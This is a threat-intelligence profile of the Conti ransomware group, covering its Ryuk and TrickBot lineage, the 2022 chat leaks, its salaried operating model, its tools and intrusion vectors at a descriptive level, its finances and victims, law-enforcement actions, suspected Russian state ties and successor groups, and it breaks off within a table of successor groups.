Ransomware EDP  •  Threat Actor Library
therenoproject.org  •  Analytical Profiles
Threat Actor Profile  •  Ransomware-as-a-Service
Conti
Wizard Spider / GOLD ULRICK  •  Russia-based  •  Active Dec 2019 – May 2022  •  Diaspora ongoing
Brand Defunct Diaspora Active RaaS (Hybrid) Critical Infrastructure
Lifetime Revenue
$2.7B
Ryuk/Conti combined est.
2021 Revenue Alone
$180M
Highest of any group that year
Confirmed Victims
1,000+
47 US states + 31 countries
Peak Workforce
100+
Salaried employees
Leaked Messages
170K+
Internal Jabber logs, 2022
Known Successors
6+
Akira, Black Basta, Royal, others
01 Executive Summary and Group Overview
Overall Assessment

Conti was the most financially destructive ransomware operation ever documented. Operated by the Russia-based Wizard Spider criminal syndicate, it generated an estimated $180 million in extortion revenue in 2021 alone and accumulated over $2.7 billion across its full operational lifetime (Ryuk and Conti combined). Conti evolved from the TrickBot/Ryuk ecosystem into a full-spectrum Ransomware-as-a-Service empire, run with the organizational structure, HR departments, and professional divisions of a legitimate technology company.

Its implosion in May 2022 was triggered not by law enforcement, but by an internal actor: a Ukrainian security researcher who, incensed by Conti's public declaration of support for Russia's invasion of Ukraine, leaked nearly two years of internal communications. The brand collapsed; the organization did not. Core operators dispersed into a constellation of successor groups including Akira, Black Basta, Royal/BlackSuit, and others that continue operating as of May 2026. Conti is the progenitor of the most consequential criminal diaspora in ransomware history.

Confirmed

The Conti brand is defunct as of May 19, 2022. The core operating network, centered on the individual identified as Vitaly Kovalev (alias "Stern"), remains active through successor entities, with shared laundering infrastructure confirmed by TRM Labs through 2026. [1][4][6]

Quick-Reference Attributes
StatusDEFUNCT (Conti brand, May 2022) / ACTIVE (diaspora entities, 2026)
First ObservedDecember 2019 (Conti deployments); antecedent Ryuk activity from September 2018
Brand ShutteredMay 19, 2022 (AdvIntel confirmation)
OperatorWizard Spider (CrowdStrike); GOLD ULRICK (Secureworks, Conti operators specifically)
OriginRussia (Saint Petersburg assessed; UAE operations hub from ~2020)
Revenue ModelHybrid RaaS: salaried core employees + limited affiliate revenue-sharing
Max Single Demand$25 million (documented FBI figure)
EncryptionAES-256 (initial); ChaCha stream cipher (from August 2020, selective)
CIS ExclusionConfirmed behavioral exclusion; binary kill-switch assessed but less publicly documented than peers
Decryptor AvailableBitdefender free decryptor (limited applicability; pre-key-rotation variants only)
US Reward Outstanding$10M for leadership ID/location; $5M for arrest/conviction of conspirators
Successor ProfilesAkira  |  Black Basta (defunct)  |  Royal/BlackSuit  |  Karakurt
Operational Timeline
DateEvent
Dec 2019First observed Conti deployments, distributed via TrickBot
Jun 2020CrowdStrike first observes Conti in Big Game Hunting campaigns; full transition from Ryuk
Aug 2020Conti "Conti News" data leak site launched; ChaCha encryption adopted for speed
Oct 2020NSA disrupts TrickBot botnet; internal chats document Conti's real-time reaction
Jan 2021Emotet international law enforcement takedown forces Conti reorganization
May 2021Ireland HSE attack; near-complete shutdown of national health IT network; $20M demand
Aug 2021Disgruntled affiliate leaks Conti operational playbook (precursor leak)
Sep 2021CISA/FBI/NSA joint advisory; 400+ documented attacks publicly acknowledged
Dec 2021Conti is first professional ransomware group to adopt Log4Shell (CVE-2021-44228)
Feb 25, 2022Conti posts pro-Russia statement on Ukraine invasion
Feb 27, 2022@ContiLeaks begins publishing internal Jabber logs; 60,000+ messages first tranche
Mar 2022Conti source code and TrickBot administrator materials leaked; attacks surge despite leaks
Apr–May 2022Costa Rica attacks; first cyberattack to trigger a national state of emergency
May 19, 2022Conti brand officially shuttered; all infrastructure taken offline (AdvIntel)
Sep 2023DOJ unseals three federal indictments against nine Russian nationals; OFAC/FCDO sanction 11
May 2025GangExposed begins publishing identities of Conti/TrickBot leadership; BKA names Kovalev
May 2026Deniss Zolotarjovs sentenced to 102 months: first major custodial sentence for Conti network
Data Leak Site & Branding
02 Lineage and Organizational Heritage
Wizard Spider Ecosystem: Lineage Flow
Hermes (2017) Ryuk (Sep 2018) Conti (Dec 2019) Akira / Black Basta / Royal
Ryuk-to-Conti Transition
Confirmed: High Confidence

Conti is a technical evolution of Ryuk ransomware, developed and operated by the same core group that CrowdStrike designates WIZARD SPIDER. CrowdStrike first observed Wizard Spider deploying TrickBot for financial fraud in 2016; the group deployed Ryuk in September 2018 for large-scale big game hunting; and between March and June 2020 the group completed its transition to Conti. The Ryuk-Conti-Wizard Spider lineage is corroborated by independent code analysis from multiple vendors, blockchain forensics from TRM Labs, personnel overlap documented in leaked chats, and infrastructure continuity across all three phases. No credible vendor disputes this lineage. [2][9][22]

Evidentiary Pillar 1: Code Overlap
Security analysts identify Conti as a technical evolution of Ryuk, maintaining similar obfuscation techniques while introducing a faster, multi-threaded encryption engine. The Conti source code leaked in March 2022 allowed researchers to confirm shared architecture with Ryuk. Avast Threat Labs later identified Conti code similarities in Akira, extending the lineage forward. [8][9]
Evidentiary Pillar 2: Personnel Continuity (Leaked Chats)
Senior Conti developer identified as "Professor" (subsequently identified as Vladimir Kvitko) remarked upon reading a security firm's Ryuk analysis: "adf.bat: this is my fucking batch file," confirming direct overlap between the Ryuk and Conti development teams. BleepingComputer's Lawrence Abrams summarized: "Feels like same managers were running both Ryuk and Conti, with a slow migration to Conti in June 2020. However, based on chats, some affiliates didn't know that Ryuk and Conti were run by the same people." [23]
Evidentiary Pillar 3: Blockchain Forensics (TRM Labs)
TRM Labs' on-chain analysis found that funds for salaries paid by a core Conti member were derived from a known Ryuk ransomware address. On-chain salary wallet mapping corroborated both the Conti-Ryuk tie and, separately, links between Conti and successor group laundering infrastructure through 2026. [22][4]
Evidentiary Pillar 4: Infrastructure Continuity
Conti was distributed through the same TrickBot and Emotet ("Booz"/"Buza") infrastructure used by Ryuk. Chat logs confirm shared access to the Emotet platform and show Conti leadership gradually absorbing full operational control of TrickBot, BazarLoader, and Emotet infrastructure. By the time Conti shuttered, it had become a cybercrime syndicate rather than a simple ransomware operation. [23][24]
Vendor Designation Disambiguation

Critical Rule: WIZARD SPIDER (CrowdStrike) and GOLD ULRICK (Secureworks) are distinct designations applied at different organizational levels. WIZARD SPIDER covers the umbrella criminal organization; GOLD ULRICK specifically designates the Conti ransomware operators. These must not be conflated. Mandiant's UNC1878 covers Wizard Spider broadly and predates the Conti era.

VendorDesignationScope
CrowdStrikeWIZARD SPIDERUmbrella organization; Conti is a WIZARD SPIDER capability/sub-operation
SecureworksGOLD ULRICKConti ransomware operators specifically (not the broader Wizard Spider entity)
MandiantUNC1878Wizard Spider parent organization; predates Conti era, applied broadly
Palo Alto Unit 42Conti Ransomware GangTracked as part of "Ransom Cartel" ecosystem; no distinct proprietary name
Recorded FutureContiRated second most prolific ransomware as of June 2024 tracker
MicrosoftTrickBot Group / ContiNo widely published distinct Microsoft-proprietary designation

Note: Secureworks uses GOLD BLACKBURN for broader TrickBot-related criminal activity. Researchers should verify which designation a given vendor report is applying before drawing cross-vendor comparisons.

03 The Conti Leaks
Confirmed: Primary Source Material

The Conti Leaks constitute the most comprehensive exposure of a criminal organization in cybersecurity history. The events unfolded across two major waves, beginning on February 27, 2022, and produced materials that form the evidentiary backbone for the majority of definitive Conti analysis. What follows is the authoritative account of the leak sequence and its investigative significance. [1][2][10]

Precursor: The Affiliate Playbook Leak (August 2021)

Prior to the major 2022 leaks, a disgruntled Conti affiliate leaked the group's operational playbook in August 2021, revealing step-by-step intrusion procedures, tool preferences, and exploitation techniques. This prompted the September 2021 CISA/FBI/NSA joint advisory. The playbook leak was an early warning of internal tensions, particularly between affiliates who felt their treatment or revenue share was inadequate relative to the core team's salaried model. [11][43]

First Wave: Jabber Logs (February 27, 2022)

The catalytic event was Conti's February 25, 2022 public statement of support for Russia's invasion of Ukraine:

"The Conti Team is officially announcing a full support of Russian government... If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use all our possible resources to strike back at the critical infrastructures of an enemy."

Conti public statement, February 25, 2022

Within 48 hours, on February 27, 2022, a new Twitter account @ContiLeaks began publishing internal Jabber/XMPP chat logs. According to Brian Krebs and Hold Security founder Alex Holden, the leaker was a Ukrainian security researcher acting on patriotic motivation: "The person releasing this is a Ukrainian and a patriot. He's seeing that Conti is supporting Russia in its invasion of Ukraine, and this is his way to stop them in his mind at least." [10]

The initial leak contained 339 JSON files covering January 29, 2021 to February 27, 2022. Subsequent releases extended coverage to June 22, 2020 to November 16, 2020, ultimately totaling over 170,000 internal chat messages. [2][24]

What the Leaks Revealed: The Krebs Four-Part Series

Krebs on Security published a landmark four-part investigative series based entirely on the leaked logs, constituting the definitive public analysis of Conti's internal operations:

  • Part I: Evasion. How Conti detected and responded to law enforcement operations. Internal reaction when the NSA compromised TrickBot in September 2020 ("The one who made this garbage did it very well... It's just some kind of sabotage." - leader "Hof"). Crucially: Russian investigators were aware of the TrickBot/Conti investigation but had assured the group the inquiry would be closed by mid-November 2021. [10]
  • Part II: The Office. Day-to-day operations, HR practices, salaries, and organizational structure. Documented pervasive burnout, employees pleading for time off, and leaders demanding 24/7 availability. Annual summer vacations in Crimea. Conti's effort to fund legal defense for arrested TrickBot coder Alla Witte, and the cynical suggestion to leverage that relationship for inside intelligence: "Let's try to find a way to her lawyer right now and offer him to directly sell the data bypassing her." [10][23]
  • Part III: Weaponry. Conti's $60,000 legitimate Cobalt Strike license acquisition (via a $30,000 front company payment). Subscriptions to Crunchbase Pro and ZoomInfo for victim research. EDR tools (CrowdStrike Sentinel, Cylance) used to surveil its own administrators. A corrupt recovery firm negotiator nicknamed "The Spaniard" (described as Romanian, working for a large Canadian recovery firm). A journalist on payroll for 5% of payments to pressure non-paying victims. [23]
  • Part IV: Cryptocrime. Founder Stern's obsession with building a proprietary peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot. A $100,000 writing contest on Exploit forum to solicit crypto platform ideas. Evidence of involvement in the SQUID pump-and-dump of October 2021. DDoS-based crypto market manipulation. [40]
Second Wave: Source Code and TrickBot Materials (March 2022)

On March 2, 2022, @ContiLeaks posted fresh logs, demonstrating the infiltrator retained access to infrastructure Conti had not detected. A separate account, @TrickBotLeaks, posted names, photos, and personal information of TrickBot administrators before being suspended within 24 hours.

The full leaked corpus included: 60,000+ internal Jabber messages (first tranche); full Conti Locker v2 source code; administrator panel source code; decryptor tool source code; Bitcoin addresses and wallet data; negotiation logs; infrastructure documentation; phishing templates; HR materials; and screenshots of the live Conti control panel with compromised host telemetry. [1][30][44]

Immediate Operational Impact
Confirmed

The leaks initially had minimal operational impact. Secureworks (GOLD ULRICK tracking) noted that Conti victim postings actually increased in March 2022, reaching the second-highest monthly total since January 2021. The deeper damage was reputational and jurisdictional: the Conti brand became toxic for affiliates; victims paying Conti risked OFAC sanctions exposure; and the $15 million U.S. government bounty announced in May 2022 made the brand operationally untenable. The organization's response was strategic dissolution rather than destruction. [13][15][41]

The GangExposed Intelligence Operation (May 2025)

In May 2025, a figure operating as GangExposed launched what The Register described as a "high-stakes intelligence war" against Conti's former leadership. GangExposed published detailed dossiers using OSINT, darknet database purchases, and claimed access to a leaked FSB border control database acquired for approximately $250,000. [18][19]

AliasReal Name (GangExposed)BKA/DOJ CorroborationCurrent Status
Stern / Ben / DemonVitaly Nikolaevich Kovalev, 36 (Russian)Confirmed by BKA May 2025; Interpol Red Notice issuedAt large in Russia; net worth assessed >$500M crypto
ProfessorVladimir Viktorovich Kvitko, 39 (Russian; relocated to Dubai ~2020)US Rewards for Justice; $10M bounty; "burned" by GangExposed publicationDubai; assessed actively involved in ongoing operations
TargetUnidentified (State Dept photo released Aug 2022)$10M US bounty; identity not yet publicly confirmedAt large
MangoMikhail Mikhailovich TsaryovDOJ indictment (Sep 2023); GangExposed corroborationAt large in Russia
DefenderAndrey Yuryevich ZhuykovDOJ indictment; UK NCA sanction (Sep 2023)At large in Russia
Credible

GangExposed's methodology and identity remain unverified. The Kovalev identification is treated as CONFIRMED given independent BKA corroboration. Other identifications are rated CREDIBLE. Technisanct/FalconFeeds assessed the source likely has insider access; other researchers assessed GangExposed could be a former criminal burning former associates. GangExposed stated goals: identify all ~50 key participants, disrupt the Blockchain Life crypto legitimization scheme, and deprive operators of UAE safe haven. [18]

04 Operational Model
Hybrid RaaS Structure: The Salaried Core
Confirmed

Conti operated a hybrid model unique among ransomware groups. CISA noted in its September 2021 advisory: "It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds from a successful attack." The leaked chats confirmed this assessment: Conti maintained a dedicated, salaried workforce of 65-100+ employees paid bimonthly in Bitcoin, with limited external affiliate participation for specific access-broker roles.

Most low-level employees (testers, coders, administrators) earned $1,000–$2,000/month. High-performing coders could earn $5,000–$10,000/month. Senior managers confirmed to Stern on July 18, 2021 that the group employed 62 people; by July 30, payroll had grown to 87. [10][11][23]

Internal Organizational Structure

The leaked chats documented a corporate-like internal structure with departments, separate budgets, and staff schedules:

  • Coders: Programmers writing malicious code and integrating new capabilities
  • Testers: Workers testing Conti malware against antivirus products, checking every ~4 hours for new Windows Defender updates
  • Administrators: Infrastructure setup, teardown, VPN and server maintenance
  • Reverse Engineers ("Reversers"): Disassembling code, studying commercial security products, finding vulnerabilities
  • Penetration Testers / Hackers: Front-line operators conducting network intrusions
  • OSINT Team: Using Crunchbase Pro, ZoomInfo, SignalHire, Shodan, and Spiderfoot Pro for victim research and financial intelligence
  • HR Department: Actively recruiting from Russian job boards (including legitimate employment platforms) and cybercrime forums; reviewing 25–35% of relevant CVs on employment platforms

Conti also maintained what the leaked chats identified as relationships with external access brokers, paying 25–30% of ransom proceeds for specific network access. This was considered suboptimal given its cut into profit margins. [23]

Targeting Strategy: Big Game Hunting

Conti practiced "big game hunting" exclusively, targeting organizations with over $100 million in annual revenue. Ransom demands were typically set as a percentage of the victim's annual revenues. Operators used Crunchbase Pro and ZoomInfo to research victims' insurance coverage, earnings, and investor contacts for leverage. [10][23]

Negotiation Model and Double Extortion
ElementDetail
Ransom rangeUp to $25 million per incident (single-victim maximum, FBI documented)
Reduction behaviorReductions common; experienced negotiators could bring demands down substantially (e.g., sub-$100M revenue companies sometimes capped near $1M)
Payment deadlineCountdown timer on victim's dark web page; expiry triggered automatic data publication
Communication channelsDark web negotiation portal; ProtonMail; VoIP calls
Corrupt insider negotiator"The Spaniard" (Romanian, large Canadian recovery firm): maintained sympathetic relationship, shared victim internal deliberations with Conti operators
Journalist on payrollAs of March 2021, "Alarm" claimed access to a journalist who would write pressure articles against non-paying victims for 5% of payout
Double extortionPrimary demand for decryption key; separate demand for data non-publication. Paying for decryption did NOT guarantee data destruction
HSE precedentIreland HSE provided free decryptor after refusal to pay, but Conti reserved right to publish stolen data. Demonstrates keys and data are separate extortion levers
05 Technical Capabilities
Initial Access Vectors
VectorDetailPeriod
TrickBot infectionsPrimary initial vector through 2021; distributed via malspam2019–2021
BazarLoader / BazarBackdoorReplaced TrickBot as primary delivery by March 2021 as TrickBot detections improved2021–2022
Spear-phishing (malicious Excel)Macros or links to Google Drive-hosted malware; IcedID dropper files also usedThroughout
CVE-2018-13379FortiGate SSL VPN path traversal; widely exploited across ransomware groupsThroughout
ProxyShell chainCVE-2021-34473, CVE-2021-34523, CVE-2021-31207Aug 2021+
Log4ShellCVE-2021-44228Dec 13, 2021+; Conti first professional group to weaponize; targeted VMware vCenter
PrintNightmareCVE-2021-1675Referenced in CISA/FBI/NSA advisory
Stolen/weak RDP credentialsSourced from access brokers and credential marketsThroughout
Fake software / SEO poisoningDocumented in CISA advisory2021+

Log4Shell First-Mover Significance: AdvIntel confirmed Conti was the first professional ransomware operation to adopt and embed CVE-2021-44228 in their attack chain, beginning December 13, 2021, targeting VMware vCenter servers. Within days, the attack chain extended to Emotet deployment followed by Cobalt Strike. This first-mover capability was a consistent Conti signature: rapid weaponization of critical CVEs before patching could occur at scale.

Post-Exploitation and Lateral Movement
  • Cobalt Strike: $60,000 legitimate license acquired via front company. Used for network reconnaissance, lateral movement, and in-memory payload execution.
  • Mimikatz / LSASS credential dumping: Privilege escalation; overpass-the-hash Kerberos ticket acquisition documented in DFIR case studies.
  • BumbleBee loader: Replaced BazarLoader in later operations (2022).
  • SystemBC: Proxy/C2 tunneler for persistent access.
  • PsExec + SMB: Lateral movement to distribute Cobalt Strike beacons across domain-joined systems.
  • AnyDesk / RDP: Legitimate remote access tools for persistence; RDP sometimes proxied through IcedID process.
  • GPO modification: Used to disable Windows Defender across domain; force-updated via Cobalt Strike beacon.
  • Rclone / Mega.nz / dedicated VPS: Data exfiltration tooling; Rclone to cloud storage and purpose-built VPS instances for high-volume exfiltration.

The Conti playbook leak revealed a highly professional approach to dwell time: operators spent weeks inside networks before deploying ransomware. The Ireland HSE attack illustrates this: initial access on March 18, 2021, via a malicious Excel attachment; ransomware detonation not until May 14, 2021, eight weeks later, during which attackers moved across 180 systems and multiple domains. [37]

Encryption Implementation
  • Algorithm: AES-256 (initial); ChaCha stream cipher adopted August 2020 for selective, high-speed file encryption.
  • Throughput: Multi-threaded engine using up to 32 simultaneous CPU threads. ZDNet documented Conti as using "32 simultaneous CPU threads for blazing-fast encryption" (July 2020).
  • Key management: Asymmetric RSA wrapper around symmetric session key; public key embedded in binary, private key held by attackers.
  • Variants: Encrypted file extension .ODMUA in some documented variants; ransom note named CONTI_README.txt.
  • Decryptor: Bitdefender released a free Conti decryption tool after source code leak; applicability limited to variants encrypted before certain key rotation events.
CIS Exclusion
Confirmed (behavioral); Credible (binary-level implementation)

Conti's consistent avoidance of CIS-region targets across more than 1,000 confirmed attacks, with no known exceptions, is an operational signature consistent with an implicit non-prosecution understanding with Russian authorities. Binary analysis indicates Conti checks for Russian keyboard layout installation as a kill switch, consistent with the standard CIS-exclusion pattern used by other Russia-based groups. The behavioral exclusion is documented across all major sector-targeting data; the specific binary implementation details are less publicly documented than peers such as REvil. [9]

Linux / VMware ESXi Variant

Conti developed a dedicated Linux/ESXi variant targeting VMware virtual machine infrastructure, consistent with the group's enterprise-focused targeting. This variant was documented by SentinelOne and became a direct template for successor groups. Akira inherited the Conti ESXi playbook and extended it with additional VMware-targeting capabilities documented in joint FBI/CISA advisories. [39]

06 Financial Infrastructure
Revenue and Cryptocurrency Operations
Confirmed

Conti demanded payment exclusively in Bitcoin (BTC). Chainalysis identified Conti generating at least $180 million in 2021, the highest of any ransomware group that year. Total lifetime revenue across Ryuk/Conti operations is assessed at approximately $2.7 billion. The UK NCA and Chainalysis jointly assessed Conti and TrickBot attempted to extort more than $800 million from victims including hospitals, schools, local authorities, and businesses. [5][17][40]

  • Payroll: $1,000–$2,000/month for most employees; $5,000–$10,000 for senior coders; distributed in Bitcoin bimonthly
  • Ransom receipts: Single highest documented payment: $25M; Ireland HSE demanded $20M (not paid)
  • Costa Rica: $20M demand; government refused; no payment made
On-Chain Laundering and Financial Schemes

Krebs on Security's deep analysis of leaked chats (Part IV: Cryptocrime) documented extensive laundering and investment schemes directed personally by founder "Stern" (Kovalev): [40]

  • Proprietary crypto platform: Kovalev was developing a peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot with integrated NFT, DeFi, and DEX functionality, intended as a vehicle to legitimize illicit proceeds.
  • $100,000 crypto article contest: Sponsored on the Russian-language Exploit cybercrime forum to solicit intellectual property for the platform while simultaneously serving as criminal recruitment.
  • SQUID pump-and-dump: Evidence in chat logs suggests Conti involvement in the October–November 2021 SQUID token scam, which appreciated from $0.01 to $2,856 before the developers extracted approximately $3.38 million.
  • DDoS-driven crypto manipulation: An internal scheme involving DDoSing small cryptocurrency mining pools, then posing as distressed users in Discord to drive prices down before purchasing.
  • Blockchain Life Forum: GangExposed's 2025 investigation revealed Kovalev and associate Khitrov organized the "Blockchain Life" forum as a legitimization vehicle for illicitly obtained cryptocurrency earnings.
Blockchain Forensics: TRM Labs and Chainalysis
Confirmed (TRM Labs 2022; extended to diaspora 2026)

TRM Labs corroborated Conti-Ryuk blockchain ties through salary wallet analysis and on-chain transaction mapping, confirming shared financial infrastructure across both phases of Wizard Spider ransomware operations. In a separate 2023 analysis, TRM documented Conti's re-emergence as three successor groups. TRM Labs' 2026 reporting on Akira specifically confirmed that Conti's successor ecosystem (including Akira) continued sharing laundering infrastructure, providing blockchain continuity evidence linking the diaspora to the original Conti network. [22][4]

07 Victim Profile and Targeting
Scale
  • Over 1,000 attacks confirmed globally (FBI/CISA advisory, updated)
  • DOJ 2023 indictment figures: more than 900 victims in approximately 47 U.S. states, D.C., Puerto Rico, and approximately 31 foreign countries
  • $180M revenue in 2021 alone (Chainalysis); ~$2.7B total (Ryuk/Conti lifetime)
  • Over $150M in ransom payments per State Department figures at time of $15M reward announcement
Sector Targeting

Conti deliberately focused on sectors with low tolerance for downtime and high pressure to pay. Healthcare was the most systematically targeted sector; the FBI documented at least 16 Conti attacks on U.S. healthcare and first-responder networks by May 2021 alone.

SectorTargeting PriorityRationale
Healthcare / HospitalsHighestLife-critical downtime pressure; low tolerance for delay; data sensitivity
Emergency Services / First RespondersHigh911 dispatch, EMS; non-negotiable uptime dependency
Government (local/national)HighPolitical pressure to restore services; large IT budgets imply capacity to pay
EducationModerate-HighStudent/staff data leverage; large datasets
Critical InfrastructureModerate-HighUtilities, transportation; operational impact amplifies ransom pressure
Private Enterprise ($100M+ revenue)High (policy minimum)Big game hunting threshold; all commercial targets filtered by revenue floor
Geographic Distribution

Primary targets concentrated in North America (~75% U.S.-based per early FBI figures). Significant European targeting documented (UK: 149 known victims, £27 million extracted per NCA). Consistent behavioral exclusion of CIS-region targets across all documented attacks. [17][28]

High-Profile Victims
VictimDateImpactNotable Detail
Ireland HSE (Health Service Executive)May 2021Near-complete shutdown of national health IT; cancer screenings and appointments canceled; 80%+ encryptionCost estimated >$600M to remediate. Conti provided free decryptor after government refusal to pay $20M demand, but threatened data publication. First access: March 18, 2021 via malicious Excel attachment. Eight weeks of dwell time before detonation. [12][23]
Government of Costa RicaApr–May 2022~30 government institutions including Ministry of Finance; national state of emergency declaredFirst cyberattack to trigger a national emergency declaration globally. $20M demand; government refused. Used as cover for Conti brand dissolution. [14][42]
Broward County Public SchoolsMar 2021School district encrypted; $40M ransom demand; threat to release student dataNotable for targeting of minors' educational records as leverage
Scripps Health (California)May 2021Major California health system; patient care disruptedSpecific DOJ indictment filed against Maksim Galochkin for this attack [16]
AdvantechNov 2020Industrial IoT manufacturer; 3 GB of data stolenEarly high-profile Conti DLS posting [24]
City of TulsaMay 2021Government network compromiseNamed in BleepingComputer reporting [24]
08 Law Enforcement and Regulatory Response
Federal Indictments (September 2023)
Confirmed

On September 7, 2023, the DOJ unsealed three federal indictments across three jurisdictions, charging nine Russian nationals:

JurisdictionChargesMax PenaltyNamed Defendants
N.D. Ohio (TrickBot conspiracy)Conspiracy to violate CFAA; wire fraud conspiracy; money laundering conspiracy62 yearsGalochkin, Rudenskiy, Tsarev, Zhuykov, Putilin, Loguntsov, Mikhaylov, Karyagin, Khaliullin
M.D. Tennessee (Conti conspiracy)Conspiring to use Conti ransomware against U.S. targets 2020–Jun 202225 yearsGalochkin, Rudenskiy, Tsarev, Zhuykov
S.D. California (Scripps Health)Specific attack on Scripps Health May 1, 2021; impaired medical care20 yearsMaksim Galochkin specifically

All named defendants remain at large in Russia as of May 2026. [16]

Prior and Subsequent Apprehensions
IndividualRoleActionOutcome
Alla WitteTrickBot programmer (Latvian national)Arrested 2021; chargedPleaded guilty to conspiracy to commit computer fraud; sentenced to 32 months, June 2023
Vladimir DunaevTrickBot developer (Russian national)Arrested; in U.S. custody in ClevelandPending trial as of 2024
Deniss ZolotarjovsConti-linked organization (Latvian, based Moscow); operated under Conti, Karakurt, Royal, TommyLeaks, SchoolBoys, Akira brandsArrested in Georgia Dec 2023; extradited to U.S.Pleaded guilty July 2025 to conspiracy to commit money laundering and wire fraud; sentenced to 102 months May 2026. First major custodial sentence in Conti network. [6][47]
OFAC and UK FCDO Sanctions (September 2023)
Confirmed

The U.S. OFAC and UK FCDO simultaneously sanctioned 11 Russian nationals connected to Conti and TrickBot: Andrey Zhuykov, Maksim Galochkin, Maksim Rudenskiy, Mikhail Tsarev, Dmitry Putilin, Maksim Khaliullin, Sergey Loguntsov, Vadym Valiakhmetov, Artem Kurov, Mikhail Chernov, and Alexander Mozhaev. Sanctions prohibit financial transactions and enable asset seizure by U.S. and UK governments. [17]

Government Advisories and Rewards
  • May 2021: FBI alert specifically warning healthcare sector; 16 attacks on healthcare/first responder networks documented
  • September 2021: Joint CISA/FBI/NSA advisory documenting 400+ attacks, TTPs, and mitigations
  • May 2022: State Department Rewards for Justice: up to $10M for Conti leadership identification/location; up to $5M for arrest/conviction
  • August 2022: Rewards for Justice expanded: five specific operators named; photograph of "Target" released publicly
  • May 2025: BKA Germany names Vitaly Kovalev as Conti/TrickBot founder; Interpol Red Notice issued
09 Attribution and State Nexus
Credible-to-High: Implicit State Toleration. Formal tasking: Unconfirmed.
Direct Evidence from Leaked Chats

The leaked Jabber logs contain the most direct documentation of Conti's communication with Russian law enforcement available in open-source reporting. In October 2021, Conti member "Kagas" wrote to Stern:

"Our old case was resumed... The Americans officially requested information about Russian hackers... Next Tuesday, the investigator called us for a conversation, but for now, it's like [we're being called on as] witnesses. That way if the case is suspended, they can't interrogate us in any way."

Conti member "Kagas" to Stern, October 2021 (leaked chat log)

A separate Conti member immediately reported that the group's contacts had assured it the Russian-side investigation would go nowhere and would be closed by mid-November 2021. This same period saw Russian investigators appearing more interested in pursuing REvil members than Conti, culminating in the January 2022 FSB arrests of REvil, which many analysts assessed as a political gesture timed to the Ukraine buildup. The leaked chats also reference Liteyny Avenue in Saint Petersburg, home to FSB offices, in a context suggesting external contact with a helpful government-adjacent source. [10][22]

Vendor Assessments
VendorAssessmentDate
Mandiant"At least a portion of actors involved with CONTI ransomware are based in Russia and some criminals operating from there already have documented ties with Russian intelligence apparatus. More recently, publicly reported chat logs suggest that a key player in CONTI operations may have intended to provide support for government projects."Feb 2022
U.S. Department of StateExplicitly labeled Conti a "Russian government-linked ransomware-as-a-service (RaaS) group" in August 2022 Rewards for Justice announcement. Strongest public U.S. government characterization; falls short of confirming formal intelligence relationship.Aug 2022
Recorded Future (Dark Covenant 3.0)Documents ongoing pattern of Russian government tolerance for cybercriminal activity in exchange for geopolitical utility; Conti cited as defining case study in protected criminal enterprise model.Oct 2025
Assessment Summary

The available evidence supports a moderate-to-high confidence assessment of implicit state toleration. Conti received advance warning from Russian investigators, operated openly in Russia without prosecution, and consistently avoided CIS targets across 1,000+ documented attacks. The leaked chats document direct back-channel communication between Conti leadership and Russian law enforcement. A formal, active intelligence-sharing or tasking relationship cannot be confirmed from public evidence. The operational distinction is likely: Conti's ransomware attacks generated hard currency and geopolitical leverage that served Russian state interests without requiring formal direction. The protected criminal enterprise model eliminates the state's deniability costs while preserving its operational benefits.

Analyst Inference: Active FSB tasking

The reference to Liteyny Avenue (FSB headquarters street) in leaked communications, combined with the demonstrated advance warning of law enforcement inquiries, is consistent with an active FSB liaison relationship rather than passive tolerance. This remains analyst inference; the chats establish contact but not formal tasking. [10][48]

Named Individuals (Confirmed Attribution)
AliasReal NameAgeNationalityRoleSource
Stern / Ben / DemonVitaly Nikolaevich Kovalev36RussianFounder/CEO of TrickBot and Conti; supreme leaderBKA Germany; GangExposed 2025 [25][19]
ProfessorVladimir Viktorovich Kvitko39Russian (Dubai)Senior general; offshore operations; Dubai hubGangExposed 2025; US RFJ bounty [26][18]
MangoMikhail Mikhailovich TsaryovN/ARussianMid-level manager; day-to-day operationsDOJ indictment 2023; GangExposed [16][18]
DefenderAndrey Yuryevich ZhuykovN/ARussianLead systems administratorDOJ indictment; UK NCA sanction [16][17]
BentleyMaksim GalochkinN/ARussianCrypter / obfuscation; indicted in three jurisdictionsDOJ indictment [16]
BuzaMaksim RudenskiyN/ARussianDeveloper supervisorDOJ indictment [16]
TargetUnidentifiedN/AAssessed RussianSenior leader; luxury assets (Ferrari, Maybach)US RFJ $10M bounty; photo released Aug 2022 [27]
10 Trajectory Assessment and Diaspora
Why Conti Collapsed

The Conti collapse was an own-goal triggered by geopolitics. The group's public declaration of support for Russia's invasion of Ukraine was catastrophically ill-considered:

  • It exposed the group's Russian identity and state alignment to affiliates who had operational security reasons to maintain deniability
  • It triggered the Ukrainian insider who had penetrated Conti's infrastructure to act, releasing the most comprehensive criminal organization leak in cybercrime history
  • It made the Conti brand a liability for victims: paying Conti created sanctions violation exposure under OFAC
  • It caused direct internal fracture along ethnic lines, with Ukrainian members becoming adversaries

AdvIntel's Boguslavskiy and Kremez concluded: "The Conti brand, not the organization itself, is shutting down." The Costa Rica attack served simultaneously as a final high-profile operation, cover for migrating members and infrastructure, and a capability demonstration to affiliates considering defection to competing groups. [15][14]

Predecessor and Absorbed Infrastructure
GroupRelationship to ContiEvidence BasisConfidence
TrickBotAbsorbed by Conti; shared personnel and leadershipChat logs; DOJ indictments confirm shared defendantsCONFIRMED
RyukTechnical and personnel predecessorCode overlap; personnel (Professor's code comment); TRM Labs blockchain forensicsCONFIRMED
Emotet ("Booz")Distribution partner and platformChat logs confirm deep integration; Emotet had 50+ coders referencedCONFIRMED
BazarLoader/BazarBackdoorDistribution vehicle replacing TrickBotCISA advisory; security researchCONFIRMED
Successor and Diaspora Groups

Court-Confirmed Cluster: The DOJ's May 2026 sentencing of Deniss Zolotarjovs provides court-confirmed documentation of the Conti cluster model. His organization used ransom note brands including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, confirming these were overlapping operational identities used by the same core actor network, not independent organizations. [6][47]

GroupRelationshipStatus (May 2026)Key EvidenceConfidenceProfile
Black BastaConti offshoot; emerged April 2022Defunct (Feb 2025, own chat leak)Shared TTPs; Black Basta leaked chats confirmed former Conti actors; TRM Labs blockchain analysisHIGH (Analyst1, TRM Labs) [49][50]N/A
